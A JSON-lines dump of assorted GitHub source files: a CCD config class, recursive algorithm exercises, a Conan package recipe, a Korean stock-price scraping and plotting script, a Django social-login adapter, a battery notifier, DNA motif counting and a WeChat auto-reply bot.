logging.info(version._get_version_numbers())\n exit()\n\n # update the self-dict with the new values\n for key in self.keys():\n self[key] = getattr(options, key)\n\n return options\n\n def split_options_base(self):\n \"\"\"\n Prepare dicts containing preparation and inversion settings common to\n all cdd_* programs\n \"\"\"\n prep_opts = {key: self[key] for key in (\n 'plot_it_spectra',\n 'plot_reg_strength',\n 'output_dir',\n 'data_format',\n 'plot_lambda',\n )\n }\n # prep_opts['plot_it_spectra'] = options.plot_it_spectra\n prep_opts['plot'] = self['plot_spectra']\n # prep_opts['plot_reg_strength'] = options.plot_reg_strength\n # prep_opts['output_dir'] = options.output_dir\n # prep_opts['data_format'] = options.data_format\n # prep_opts['plot_lambda'] = options.plot_lambda\n\n inv_opts = {key: self[key] for key in (\n 'tausel',\n 'max_iterations',\n 'data_weighting',\n )\n }\n # inv_opts['tausel'] = options.tausel\n inv_opts['Nd'] = self['nr_terms_decade']\n # inv_opts['max_iterations'] = options.max_iterations\n\n return prep_opts, inv_opts\n\n def check_input_files(self, additional_files=[]):\n \"\"\"Check if the input files exist. In addition to the base files for\n data and frequency, also test for all filenames stored in the\n corresponding attributes as provided by the extra list.\n \"\"\"\n none_missing = True\n base_files = ['frequency_file', 'data_file']\n for attr in base_files + additional_files:\n filename = self[attr]\n if not os.path.isfile(filename):\n logging.info(\n 'Filename not found for attribute {0}: {1}'.format(\n attr, filename\n )\n )\n none_missing = False\n else:\n if not none_missing:\n exit()\n\n # check if output directory already exists\n if os.path.isdir(self['output_dir']):\n raise IOError(\n 'Output directory already exists. Please choose another ' +\n 'output directory, or delete the existing one.')\n\n def __repr__(self):\n output = '\\n'\n output += 'CCD configuration:\\n'\n for key in sorted(self.keys()):\n output += 'Entry {0}:{1}\\n'.format(key, self[key])\n\n output += '--- end ---'\n\n return output\n","repo_name":"m-weigand/ccd_tools","sub_path":"lib/lib_dd/config/cfg_base.py","file_name":"cfg_base.py","file_ext":"py","file_size_in_byte":13391,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"7915671356","text":"#\"I pledge my honor that I have abided by the Stevens Honor System\"\n#Ethan Kalika\n\ndef change(amount, coins):\n \"\"\"\n Input: an integer amount that must be reached and a list of possible coin values (the first element is assumed to always be 1)\n Output: The minimum number of coins with which ammount can be made\n \"\"\"\n if amount == 0:\n return 0\n elif amount < 0 or coins == []:\n return float(\"inf\")\n else:\n use_it = 1 + change(amount - coins[0], coins)\n loose_it = change(amount, coins[1:])\n return min(use_it, loose_it)\n","repo_name":"EthanKalika/StevensClasses","sub_path":"CS115IntrotoPython/Lab3_CoinProblem1/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"74181085689","text":"from algo1 import *\r\nfrom linkedlist import *\r\nfrom diccionary import *\r\n\r\ndef busquedaBinaria(lista, x): \r\n currentnode = lista.head\r\n A = Array(length(lista),0)\r\n cont = 0\r\n while currentnode != None:\r\n A[cont] = currentnode.value\r\n currentnode = currentnode.nextNode\r\n cont = cont + 1\r\n i = 0\r\n pivote = len(A) // 2\r\n j = len(A) - 1\r\n flag = True\r\n while flag == True:\r\n if j == pivote or i == pivote or A[pivote] == x:\r\n return True\r\n if A[pivote] > x:\r\n j = pivote - 1\r\n pivote = i + (j - i)//2\r\n if A[pivote] < x: \r\n i = pivote + 1\r\n pivote = i + (j - i)//2\r\n return False\r\n\r\ndef busquedaKesimo(lista, k):\r\n large = length(lista)\r\n busquedaKesimoWrapped(lista,0,large - 1,k-1)\r\n return access(lista,k-1)\r\n\r\ndef busquedaKesimoWrapped(L,inicio,fin,position):\r\n if inicio > fin:\r\n return\r\n pivote = accesposition(L,(fin + inicio)//2) #Busco el pivote entre 3 opciones\r\n initnode = accesposition(L,inicio)\r\n pivotevalue = pivote.value #Me guardo el value del pivote para el proximo switch\r\n switchvalues(initnode,pivote) #cambio el valor del pivote\r\n delimitador = initnode #Inicio un puntero que va avanzando para ordenar la lista con los menores a la izquierda\r\n currentnode = initnode\r\n inicioposicion = inicio\r\n for n in range(inicio, fin + 1):\r\n if currentnode.value < pivotevalue:\r\n delimitador = delimitador.nextNode #avanzo el delimitador para cambiarlo\r\n switchvalues(delimitador,currentnode)\r\n inicioposicion = inicioposicion +1\r\n currentnode = currentnode.nextNode\r\n switchvalues(initnode,delimitador)\r\n if position <= inicioposicion: \r\n busquedaKesimoWrapped(L,inicio, inicioposicion-1,position)\r\n if position > inicioposicion:\r\n busquedaKesimoWrapped(L,inicioposicion+1,fin,position)\r\ndef switchvalues(nodeA,nodeB):\r\n value1 = nodeA.value\r\n value2 = nodeB.value\r\n nodeA.value = value2\r\n nodeB.value = value1\r\n #Obtiene el pivote de la lista comparando el inicio, el fin y la mitad\r\n\r\n\r\ndef subsecuenciaCreciente_DnC(numeros):\r\n L = LinkedList()\r\n for n in range(len(numeros)):\r\n add(L,numeros[n])\r\n return subsecuenciaCreciente_DnCWrapped(L)\r\ndef subsecuenciaCreciente_DnCWrapped(L):\r\n large = length(L)\r\n if large == 1 or large == 2:\r\n if large == 2:\r\n if isSubCreciente(L) == True:\r\n return L\r\n else:\r\n return getMinor(L)\r\n else:\r\n return L\r\n mid = int(large/2)\r\n Le = LinkedList() #Creo la lista izquierda\r\n currentnode = L.head\r\n for n in range(0,mid): #Paso los elementos hasta la mitad\r\n add(Le,currentnode.value)\r\n currentnode = currentnode.nextNode\r\n Le = inverse(Le)\r\n R = LinkedList() #Creo la lista derecha\r\n for u in range(mid+1,large +1 ): #Lo mismo\r\n add(R,currentnode.value)\r\n currentnode = currentnode.nextNode\r\n R = inverse(R)\r\n Left = subsecuenciaCreciente_DnCWrapped(Le) #Llamo a la recursividad del lado izquierdo y lo guardo\r\n Right = subsecuenciaCreciente_DnCWrapped(R) #LLamo a la recursividad del lado derecho y lo guardo\r\n return gitmerge(Left,Right) #Merge a los resultados\r\n#Funcion que mergea 2 listas en 1 y los ordena\r\n\r\ndef gitmerge(L,R):\r\n Lfinal = LinkedList()\r\n largeL = length(L)\r\n largeR = length(R)\r\n i = j = 0\r\n nodeleft = L.head\r\n noderight = R.head\r\n lastNodeLeft = accesposition(L,largeL-1)\r\n if lastNodeLeft.value < R.head.value:\r\n lastNodeLeft.nextNode = R.head\r\n return L\r\n else:\r\n if largeL == 1:\r\n return R\r\n nodeL = accesposition(L,largeL-2)\r\n cont = 2\r\n while nodeL != L.head:\r\n if nodeL.value < R.head.value:\r\n nodeL.nextNode = R.head\r\n return L\r\n else:\r\n cont = cont + 1\r\n nodeL = accesposition(L,largeL-cont)\r\ndef isSubCreciente(L):\r\n currentnode = L.head\r\n if length(L) == 1:\r\n return True\r\n while currentnode.nextNode != None:\r\n if currentnode.value > currentnode.nextNode.value:\r\n return False\r\n currentnode = currentnode.nextNode\r\n return True\r\n\r\ndef getMinor(L):\r\n currentnode = L.head\r\n Lminor = LinkedList()\r\n if currentnode.value > currentnode.nextNode.value:\r\n add(Lminor, currentnode.nextNode.value)\r\n else:\r\n add(Lminor, currentnode.value)\r\n return Lminor\r\n\r\n#Ejercicio 4\r\nclass CharWithPos:\r\n char = None\r\n position = None\r\n\r\n\r\ndef distancia(string1, string2): \r\n string1 = String(string1)\r\n string2 = String(string2)\r\n largo1 = len(string1)\r\n largo2 = len(string2)\r\n dist = 0\r\n String1List= LinkedList()\r\n for n in range(len(string1)-1,-1,-1):\r\n char = CharWithPos()\r\n char.char = string1[n]\r\n char.position = n\r\n add(String1List,char)\r\n\r\n String2List= LinkedList()\r\n for i in range(len(string2)-1,-1,-1):\r\n char = CharWithPos()\r\n char.char = string2[i]\r\n char.position = i\r\n add(String2List,char) \r\n\r\n if largo1 > largo2:\r\n L = charsUsed(String1List,String2List)\r\n corto = string2\r\n else:\r\n L = charsUsed(String2List,String1List)\r\n corto = string1\r\n\r\n definitive = Array(len(corto),\"\")\r\n currentNode = L.head\r\n while currentNode != None:\r\n if currentNode.value.position < len(corto) -1:\r\n if corto[currentNode.value.position] == currentNode.value.char:\r\n definitive[currentNode.value.position] = currentNode.value.char\r\n currentNode = currentNode.nextNode\r\n \r\n for i in range(len(definitive)):\r\n if definitive[i] == None:\r\n dist = dist + 1\r\n\r\n return dist\r\n \r\n\r\ndef extractCharsUsed(stringLarge, stringShort):\r\n L = LinkedList()\r\n D = Array(127,Diccionary())\r\n cantidadDeExistencias = 0\r\n currentNode = stringLarge.head\r\n while currentNode != None:\r\n dic_insert(D,ord(currentNode.value.char),currentNode.value,ord(currentNode.value.char))\r\n currentNode = currentNode.nextNode\r\n currentNode = stringShort.head\r\n while currentNode != None:\r\n if D[ord(currentNode.value.char)] != None:\r\n cantidadDeExistencias = cantidadDeExistencias + 1\r\n add(L,D[ord(currentNode.value.char)].head.value)\r\n dic_insert(D,ord(currentNode.value.char),currentNode.value,ord(currentNode.value.char))\r\n \r\n currentNode = currentNode.nextNode\r\n if cantidadDeExistencias == length(stringLarge):\r\n return L\r\n else: \r\n return None\r\n\r\ndef charsUsed(stringLarge, stringShort):\r\n if stringLarge == None:\r\n return None\r\n large = length(stringLarge)\r\n L = extractCharsUsed(stringLarge,stringShort)\r\n if L != None: #Recursividad principal\r\n return L\r\n if stringLarge.head.nextNode == None: #Si el valor esta solo\r\n return None\r\n mid = int(large/2)\r\n Le = LinkedList() #Creo la lista izquierda\r\n currentnode = stringLarge.head\r\n for n in range(0,mid): #Paso los elementos hasta la mitad\r\n add(Le,currentnode.value)\r\n currentnode = currentnode.nextNode\r\n Le = inverse(Le)\r\n R = LinkedList() #Creo la lista derecha\r\n for u in range(mid+1,large +1 ): #Lo mismo\r\n add(R,currentnode.value)\r\n currentnode = currentnode.nextNode\r\n R = inverse(R)\r\n Left = charsUsed(Le, stringShort) #Llamo a la recursividad del lado izquierdo y lo guardo\r\n Right = charsUsed(R, stringShort) #LLamo a la recursividad del lado derecho y lo guardo\r\n return gitmergeChars(Left,Right)\r\n\r\ndef gitmergeChars(L,R):\r\n Lfinal = LinkedList()\r\n if L != None and R != None: \r\n largeL = length(L)\r\n nodeleft = L.head\r\n lastNodeLeft = accesposition(L,largeL-1)\r\n lastNodeLeft.nextNode = R.head\r\n return L\r\n else:\r\n if R != None:\r\n return R\r\n if L != None:\r\n return L\r\n","repo_name":"Landriou/Estrategia-algoritmicos","sub_path":"DivideAndConquer.py","file_name":"DivideAndConquer.py","file_ext":"py","file_size_in_byte":8118,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14990610815","text":"# Move Element To End\n# 🟠 Medium\n#\n# https://www.algoexpert.io/questions/move-element-to-end\n#\n# Tags: Array - Two Pointers\n\nimport timeit\n\n\n# Use a read and an insert pointers, first make sure that the value\n# under the insert pointer is not the target value, then check the read\n# pointer and, if it holds the target value, swap them and slide both\n# pointers.\n#\n# Time complexity: O(n) - We will visit each element once.\n# Space complexity: O(1) - Constant extra memory.\nclass Solution:\n def moveElementToEnd(self, array, toMove):\n # Use two pointers, read and insert.\n read, insert = 0, len(array) - 1\n while read < insert:\n # If the value under the insert pointer is the\n # target, we don't want to insert there.\n if array[insert] == toMove:\n insert -= 1\n continue\n # Insert now points to a different value.\n # If read points to the target value, swap it with insert.\n if array[read] == toMove:\n array[read], array[insert] = array[insert], array[read]\n insert -= 1\n # Always slide the read pointer.\n read += 1\n return array\n\n\ndef test():\n executors = [Solution]\n tests = [\n [[], 8, []],\n [[3, 3, 3, 3, 3], 3, [3, 3, 3, 3, 3]],\n [[3, 1, 2, 4, 5], 3, [5, 1, 2, 4, 3]],\n [[2, 1, 2, 2, 2, 3, 4, 2], 2, [4, 1, 3, 2, 2, 2, 2, 2]],\n ]\n for executor in executors:\n start = timeit.default_timer()\n for _ in range(1):\n for col, t in enumerate(tests):\n sol = executor()\n result = sol.moveElementToEnd(t[0], t[1])\n exp = t[2]\n assert result == exp, (\n f\"\\033[93m» {result} <> {exp}\\033[91m for\"\n + f\" test {col} using \\033[1m{executor.__name__}\"\n )\n stop = timeit.default_timer()\n used = str(round(stop - start, 5))\n cols = \"{0:20}{1:10}{2:10}\"\n res = cols.format(executor.__name__, used, \"seconds\")\n print(f\"\\033[92m» {res}\\033[0m\")\n\n\ntest()\n","repo_name":"raul-sauco/coding-challenges","sub_path":"algoexpert/move-element-to-end.py","file_name":"move-element-to-end.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31940688175","text":"import os\n\nfrom conans import ConanFile, CMake, tools\n\nrequired_conan_version = \">=1.33.0\"\n\n\nclass FlintConan(ConanFile):\n name = \"flint\"\n description = \"FLINT (Fast Library for Number Theory)\"\n license = \"LGPL-2.1-or-later\"\n topics = (\"math\", \"numerical\")\n homepage = \"https://www.flintlib.org\"\n url = \"https://github.com/conan-io/conan-center-index\"\n exports_sources = [\"CMakeLists.txt\", \"patches/**\"]\n generators = \"cmake\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n }\n\n _cmake = None\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n @property\n def _build_subfolder(self):\n return \"build_subfolder\"\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n\n def requirements(self):\n self.requires(\"gmp/6.2.1\")\n self.requires(\"mpfr/4.1.0\")\n if self.settings.compiler == \"Visual Studio\":\n self.requires(\"pthreads4w/3.0.0\")\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version], destination=self._source_subfolder, strip_root=True)\n\n def build(self):\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n tools.patch(**patch)\n cmake = self._configure_cmake()\n cmake.build()\n\n def _configure_cmake(self):\n if self._cmake:\n return self._cmake\n self._cmake = CMake(self)\n self._cmake.definitions[\"BUILD_TESTING\"] = False\n self._cmake.definitions[\"BUILD_DOCS\"] = False\n self._cmake.definitions[\"WITH_NTL\"] = False\n # IPO/LTO breaks clang builds\n self._cmake.definitions[\"IPO_SUPPORTED\"] = False\n # No BLAS yet\n self._cmake.definitions[\"CMAKE_DISABLE_FIND_PACKAGE_CBLAS\"] = True\n # handle run in a cross-build\n if tools.cross_building(self):\n self._cmake.definitions[\"FLINT_USES_POPCNT_EXITCODE\"] = \"1\"\n self._cmake.definitions[\"FLINT_USES_POPCNT_EXITCODE__TRYRUN_OUTPUT\"] = \"\"\n self._cmake.configure(build_folder=self._build_subfolder)\n return self._cmake\n\n def package(self):\n self.copy(\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n cmake = self._configure_cmake()\n cmake.install()\n\n def package_info(self):\n self.cpp_info.names[\"cmake_find_package\"] = \"libflint\"\n self.cpp_info.names[\"cmake_find_package_multi\"] = \"libflint\"\n\n if self.settings.os in (\"FreeBSD\", \"Linux\"):\n self.cpp_info.system_libs = [\"pthread\", \"m\"]\n\n self.cpp_info.includedirs.append(os.path.join(\"include\", \"flint\"))\n self.cpp_info.libs = tools.collect_libs(self)\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/flint/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"40037945895","text":"# 한국 거래소 데이터 => 종목코드\n\n# 네이버 금융에 특정 기업을 분석한다. 분석 대상은 신라젠이라는 기업.\n\n# jupyter notebook은 반드시 크롬에서 실행한다.\n\n\nimport pandas as pd\n\n# html에 있는 정보를 읽어온다.\n\n# header = 0 으로 맨 윗줄의 데이터를 헤더로 사용하고 얻은 자료를 리스트 형태로 이용하기 위해 뒤에 [0] 을 붙여준다.\n\ncode_df = pd.read_html('http://kind.krx.co.kr/corpgeneral/corpList.do?method=download&searchType=13', header=0)[0]\n\n# 타입을 확인\n\nprint(type(code_df)) # \n\nprint(code_df.head()) # 데이터를 확인\n\n# code_df에 있는 '종목코드' 컬럼을 0을 채운 6자리 포멧으로 맞춰준다.\n\ncode_df.종목코드 = code_df.종목코드.map('{:06d}'.format)\n\n# code_df를 회사명과 종목코드 컬럼만 뽑아낸다.\n\n# ***참고*** pandas에서 컬럼을 선택 할 때\n\n# 단일개 선택: df['컬럼명'] or df.컬럼명\n\n# 여러개 선택: df[['컬럼명', ... ,'컬럼명']]\n\ncode_df = code_df[['회사명', '종목코드']]\n\nprint(code_df) # 데이터를 확인\n\n# 한글로된 컬럼명을 영어로 바꿔준다.\n\ncode_df = code_df.rename(columns={'회사명': 'name', '종목코드': 'code'})\n\n\n# 신라젠 네이버 금융 주소. http://finance.naver.com/item/main.nhn?code=215600\n\n# 함수 생성 => 특정한 업체만 코드를 가져오기 위해서\n\ndef get_url(item_name, code_df):\n # 코드를 가져오기 위한 처리.\n\n # 먼저 .query(\"name=='{}'\".format(item_name))['code']는 name 컬럼에 item_name과 동일한 값의 code값을 반환한다는 뜻.\n\n # 즉, .query(\"쿼리\".format(쿼리에 넣을 데이터))[얻을 자료]\n\n # .to_string(index = False)로 위에서 얻어진 값에 index를 빼고 string타입으로 바꿔준다.\n\n code = code_df.query(\"name=='{}'\".format(item_name))['code'].to_string(index=False)\n\n # url은 일일 종가 시가 고가 저가 거래량을 보여주는 표이다.\n\n url = 'http://finance.naver.com/item/sise_day.nhn?code={code}'.format(code=code)\n\n print(\"요청 URL = {}\".format(url))\n\n return url\n\n\n# 신라젠 정보 가져오기\n\nitem_name = '신라젠'\n\nurl = get_url(item_name, code_df)\n\ndf = pd.DataFrame()\n\n# 크롤링. 페이지 20까지 크롤링을 한다.\n\nfor page in range(1, 21):\n # 위에서 얻은 url에 page를 붙여줘서 url 포멧을 만들어준다.\n\n pg_url = '{url}&page={page}'.format(url=url, page=page)\n\n # pandas의 df에 위에서 얻은 url을 넣어줘서 우리가 구하고자 하는 데이터프레임을 만든다.\n\n # 데이터프레임을 만들 때 리스트에 [0]을 붙여줘서 만들 수 있음을 다시 확인.\n\n df = df.append(pd.read_html(pg_url, header=0)[0], ignore_index=True)\n\n# df.dropna()를 이용해 결측값(NaN) 있는 행을 제거한다.\n\ndf = df.dropna()\n\n# 상위 5개 데이터 확인하기\n\nprint(df.head())\n\n# 한글로 된 컬럼명을 영어로 바꿔준다.\n\ndf = df.rename(columns={'날짜': 'date', '종가': 'close', '전일비': 'diff',\n\n '시가': 'open', '고가': 'high', '저가': 'low', '거래량': 'volume'})\n\n# 데이터의 타입을 int형으로 바꿔줌. \\(역슬래쉬)는 뒤에 데이터가 이어진다는 의미이다. 한줄로 쓰면 \\ 필요없음.\n\ndf[['close', 'diff', 'open', 'high', 'low', 'volume']] \\\n \\\n = df[['close', 'diff', 'open', 'high', 'low', 'volume']].astype(int)\n\n# 컬럼명 'date'의 타입을 date로 바꿔줌\n\ndf['date'] = pd.to_datetime(df['date'])\n\n# 일자(date)를 기준으로 오름차순 정렬\n\ndf = df.sort_values(by=['date'], ascending=True)\n\n# 상위 5개 데이터 확인\n\nprint(df.head())\n\n# 시각화 파트\n\n\n# jupyter notebook 에서 출력. 꼭 jupyter notebook에서 해야한다.\n\n# 만약 jupyter notebook에서 출력하기 싫다면 아래에 적어놓는 방법을 이용하자.\n\n\nimport plotly.offline as offline\n\nimport plotly.graph_objs as go\n\n# plotly 접속\n\noffline.init_notebook_mode(connected=True)\n\n# 그래프를 생성. x축에는 날짜, y축에는 종가, 그래프 이름은 item_name에서 가져온다.\n\ntrace = go.Scatter(x=df.date, y=df.close, name=item_name)\n\n# 위에 데이터 정보를 data라는 객체의 리스트로 담아준다.\n\ndata = [trace]\n\n# 레이아웃 잡기\n\nlayout = dict(title='{}의 종가(close) Time Series'.format(item_name), # 타이틀 생성.\n\n xaxis=dict(\n\n rangeselector=dict(\n\n buttons=list([ # 한 달, 세 달, 6달, 전체 종가를 보여주는 버튼을 만든다.\n\n dict(\n\n count=1, # 1개씩 센다. 여기서는 step='month'이기 때문에 1달이 된다.\n\n label='1m', # 라벨 이름. 그래프에 1m이라는 버튼을 만든다.\n\n step='month', # 한 달을 기준으로 잡아서 count를 센다.\n\n stepmode='backward'), # 가장 최근 데이터부터 센다. forward는 가장 오래된 데이터부터 센다.\n\n dict(\n\n count=3,\n\n label='3m',\n\n step='month',\n\n stepmode='backward'),\n\n dict(\n\n count=6,\n\n label='6m',\n\n step='month',\n\n stepmode='backward'),\n\n dict(\n\n step='all')])), # 전체 데이터를 출력한다. step='all'은 label을 설정할 수 없다.\n\n rangeslider=dict(),\n\n type='date'\n\n )\n\n )\n\n# graph object에 data, layout을 저장한다.\n\nfig = go.Figure(data=data, layout=layout)\n\n# 플롯을 출력한다.\n\noffline.iplot(fig)\n\n# jupyter notebook 에서 출력하기 싫을 때 사용하는 방법.\n\n# html로 만든다.\n\n\nimport plotly.offline as offline\n\nimport plotly.graph_objs as go\n\n# # plotly 접속\n\n# offline.init_notebook_mode(connected=True)\n\n# 그래프를 생성. x축에는 날짜, y축에는 종가, 그래프 이름은 item_name에서 가져온다.\n\ntrace = go.Scatter(x=df.date, y=df.close, name=item_name)\n\n# 위에 데이터 정보를 data라는 객체의 리스트로 담아준다.\n\ndata = [trace]\n\n# 레이아웃 잡기\n\nlayout = dict(title='{}의 종가(close) Time Series'.format(item_name), # 타이틀 생성.\n\n xaxis=dict(\n\n rangeselector=dict(\n\n buttons=list([ # 한 달, 세 달, 6달, 전체 종가를 보여주는 버튼을 만든다.\n\n dict(\n\n count=1, # 1개씩 센다. 여기서는 step='month'이기 때문에 1달이 된다.\n\n label='1m', # 라벨 이름. 그래프에 1m이라는 버튼을 만든다.\n\n step='month', # 한 달을 기준으로 잡아서 count를 센다.\n\n stepmode='backward'), # 가장 최근 데이터부터 센다. forward는 가장 오래된 데이터부터 센다.\n\n dict(\n\n count=3,\n\n label='3m',\n\n step='month',\n\n stepmode='backward'),\n\n dict(\n\n count=6,\n\n label='6m',\n\n step='month',\n\n stepmode='backward'),\n\n dict(\n\n step='all')])), # 전체 데이터를 출력한다. step='all'은 label을 설정할 수 없다.\n\n rangeslider=dict(),\n\n type='date'\n\n )\n\n )\n\n# graph object에 data, layout을 저장한다.\n\nfig = go.Figure(data=data, layout=layout)\n\n# 플롯을 출력한다.\n\noffline.iplot(fig)\n\n# 여기까지 끝나면 temp-plot.html이 생성되는데 이걸 출력하면 jupyter에서 출력되는 것과 동일한 그래프가 나온다.\n\n# 경로와 이름을 지정하고 싶으면 offline.plot(fig, filename = '원하는 경로/원하는 이름.html')을 하면 된다.\n","repo_name":"mistrel-git/my_project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8413,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13037826791","text":"from allauth.socialaccount.adapter import DefaultSocialAccountAdapter\n\nfrom .models import User\n\n\nclass SocialAccountAdapter(DefaultSocialAccountAdapter):\n\n def pre_social_login(self, request, sociallogin):\n \"\"\"\n Override in order to merge accounts that are email verified.\n \"\"\"\n\n # Already exists\n if sociallogin.is_existing:\n return\n\n # we need the email for login\n if 'email' not in sociallogin.account.extra_data:\n return\n\n try:\n user = User.objects.get(\n emailaddress__email__iexact=sociallogin.account.extra_data['email'],\n emailaddress__verified=True,\n )\n except User.DoesNotExist:\n return\n\n sociallogin.connect(request, user)\n","repo_name":"studyhub-co/physics-is-beautiful","sub_path":"pib_auth/adapters.py","file_name":"adapters.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"23297328012","text":"import psutil\r\nfrom plyer import notification\r\nimport time\r\n\r\n#import sensors battery class from psutils which contains battery remaining info\r\nswitch = 1\r\nwhile(switch):\r\n battery = psutil.sensors_battery()\r\n percent = battery.percent\r\n # time_left = battery.secsleft #seconds left\r\n is_charging = battery.power_plugged\r\n\r\n if( (is_charging) & (percent > 97) ):\r\n while((is_charging) & (percent > 97)):\r\n notification.notify(\r\n title = \"Battery Full!!!\",\r\n message = f\"Percentage = {str(percent)}%. UNPLUG!\",\r\n timeout=30,\r\n )\r\n time.sleep(10)\r\n \r\n #new object instance\r\n battery = psutil.sensors_battery()\r\n is_charging = battery.power_plugged\r\n if(is_charging == False):\r\n break\r\n elif(is_charging):\r\n notification.notify(\r\n title = \"Battery Charging!\",\r\n message = f\"Battery Currently at - {str(percent)}%\",\r\n timeout=10,\r\n )\r\n else:\r\n notification.notify(\r\n title = \"Battery In Use.\",\r\n message = f\"Battery Remaining - {str(percent)}%\",\r\n timeout=10,\r\n )\r\n \r\n\r\n #program repeats execution after every (min * 60mins)\r\n time.sleep(15*60)\r\n\r\n\r\n #continue to restart loop\r\n continue","repo_name":"snndmaa/Battery-Health-Regualtor","sub_path":"battery_info.py","file_name":"battery_info.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40251755168","text":"'''\nhttps://leetcode-cn.com/problems/gray-code\n\n格雷编码是一个二进制数字系统,在该系统中,两个连续的数值仅有一个位数的差异。\n给定一个代表编码总位数的非负整数 n,打印其格雷编码序列。格雷编码序列必须以 0 开头。\n示例 1:\n输入: 2\n输出: [0,1,3,2]\n解释:\n00 - 0\n01 - 1\n11 - 3\n10 - 2\n\n对于给定的 n,其格雷编码序列并不唯一。\n例如,[0,2,3,1] 也是一个有效的格雷编码序列。\n\n00 - 0\n10 - 2\n11 - 3\n01 - 1\n示例 2:\n输入: 0\n输出: [0]\n解释: 我们定义格雷编码序列必须以 0 开头。\n 给定编码总位数为 n 的格雷编码序列,其长度为 2n。当 n = 0 时,长度为 20 = 1。\n 因此,当 n = 0 时,其格雷编码序列为 [0]。\n'''\n\nclass Solution:\n def grayCode(self, n):\n \"\"\"\n :type n: int\n :rtype: List[int]\n \"\"\"\n \n\n\nif __name__ == '__main__':\n s = Solution()\n # ret = s.\n print(s)\n","repo_name":"chanfengsr/AllPrivateProject","sub_path":"Python/LeetCodeTraining/题库/0089 格雷编码(Gray Code).py","file_name":"0089 格雷编码(Gray Code).py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"28588410127","text":"#inputs are the motifs, a list of kmers (strings)\n#output the count matrix of motifs as a dictionary of lists\n\ndef Count(Motifs):\n count = {} #final dictionary\n rows = Motifs\n row = len(rows[0]) #6\n for symbol in \"ACGT\":\n count[symbol] = [] #4 empty lists now exist\n for nucleotide in range(row):\n count[symbol].append(0)\n #count looks like this: {'A': [0, 0, 0, 0, 0, 0], 'C': [0, 0, 0, 0, 0, 0], 'G': [0, 0, 0, 0, 0, 0], 'T': [0, 0, 0, 0, 0, 0]}\n #added a 0 to each empty list for how many nucleotides there are in a row, 6.\n\n t = len(Motifs)\n for i in range(t): # for each kmer in Motifs\n for j in range(row): # for each element of the kmer\n symbol = Motifs[i][j] # assigns symbol to A, C, G, or T\n count[symbol][j] += 1 # adds 1 to the position in the list assigned to the key. when we iterate over an A, add 1 to A's count.\n # print(symbol, count[symbol][j])\n return count\n\nprint(Count([\n \"AACGTG\",\n \"GTGCAC\",\n \"GTGCGT\",\n \"CACGTG\",\n \"CCCGGT\"\n]))\n\n\n#Write a function such that\n# Input: A list of kmers Motifs\n# Output: the profile matrix of Motifs, as a dictionary of lists.\n\ndef Profile(Motifs):\n profile = {} #final dictionary\n profile = Count(Motifs) #subroutine\n\n #{'A': [1, 2, 0, 0, 1, 0], 'C': [2, 1, 3, 2, 0, 1], 'G': [2, 0, 2, 3, 2, 2], 'T': [0, 2, 0, 0, 2, 2]}\n\n\n t = len(Motifs) #5, how many strings in the motifs list\n k = len(Motifs[0]) #6, how many characters/nucelotides in each row\n\n for i in profile:\n for j in range(k):\n profile[i][j] = profile[i][j]/t\n\n return profile\n\nprint(Profile([\n \"AACGTG\",\n \"GTGCAC\",\n \"GTGCGT\",\n \"CACGTG\",\n \"CCCGGT\"\n]))\n","repo_name":"amkera/python_for_bioinformatics","sub_path":"count_motifs.py","file_name":"count_motifs.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29282545842","text":"#coding=utf8\nimport itchat, time, tuling\nfrom itchat.content import *\n\n@itchat.msg_register([TEXT])\ndef text_reply(msg):\n msgContent = msg['Text']\n msg.user.send(tuling.getTulingResponse(msgContent))\n #return itchat.send(getTulingRes(msg))\n\n@itchat.msg_register(FRIENDS)\ndef add_friend(msg):\n msg.user.verify()\n msg.user.send('很高兴认识你!')\n\n@itchat.msg_register(TEXT, isGroupChat=True)\ndef text_reply(msg):\n if msg['isAt']:\n msgContent = msg['Text']\n itchat.send(tuling.getTulingResponse(msgContent))\n\nitchat.auto_login()\nitchat.run()\n\n","repo_name":"LongQi/xiaoni","sub_path":"xiaoni.py","file_name":"xiaoni.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29335681419","text":"#Conversión de Decimal a Binario\nNumber = int(input(\"adjunte un número decimal: \")) \n\nlista = [] \n\nwhile Number>0: \n\n resto = int(Number%2) \n\n lista.append(resto) \n\n Number = (Number-resto)/2 \n\nNumber_bin = \"\" \n\nfor e in lista[::-1]: \n\n Number_bin = Number_bin + str(e) 